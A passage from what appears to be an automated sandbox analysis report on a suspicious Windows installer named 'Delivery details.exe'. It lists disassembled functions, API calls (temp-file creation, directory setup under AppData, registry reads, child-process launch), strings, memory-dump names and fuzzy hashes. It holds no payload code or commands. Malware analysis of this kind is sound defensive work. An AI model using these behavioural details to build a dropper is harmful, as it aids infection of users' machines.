driftsresultaters, xrefs: 00405435, 00405445, 0040544B, 0040546E, 0040547A

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: driftsresultaters
API String ID: 2531174081-1118024360
Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38

Strings

Times New Roman, xrefs: 00401E1E

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
Opcode Fuzzy Hash: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040671A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
wsprintfW.USER32 ref: 0040676C
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780

Strings

\, xrefs: 00406742
UXTHEME, xrefs: 00406723
%s%S.dll, xrefs: 00406766

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798

Uniqueness

Uniqueness Score: -1.00%

Function 00405ED1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EEF
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Delivery details.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036D5), ref: 00405F0A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405ED6, 00405EDA
nsa, xrefs: 00405EDE
"C:\Users\user\Desktop\Delivery details.exe", xrefs: 00405ED1

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Delivery details.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3995105316
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004032C2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004032D6

Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
SetFilePointer.KERNELBASE(003472C5,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404

Strings

!Y, xrefs: 00403320

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: !Y
API String ID: 1092082344-3540414309
Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D3A
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004058E3: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405926

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured
API String ID: 1892508949-3501646704
Opcode ID: 71936794605e59e2cdcdbf469d43b529cd82272ccd62be37bc64b204d99928a8
Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
Opcode Fuzzy Hash: 71936794605e59e2cdcdbf469d43b529cd82272ccd62be37bc64b204d99928a8
Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E

Uniqueness

Uniqueness Score: -1.00%

Function 0040627E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004064F2,80000002), ref: 004062C4
RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,driftsresultaters), ref: 004062CF

Strings

: Completed, xrefs: 00406285

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
CloseHandle.KERNEL32(?), ref: 004059CB

Strings

Error launching installer, xrefs: 004059A8

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406EEF Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070F0 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E06 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040690B Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406D59 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E77 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
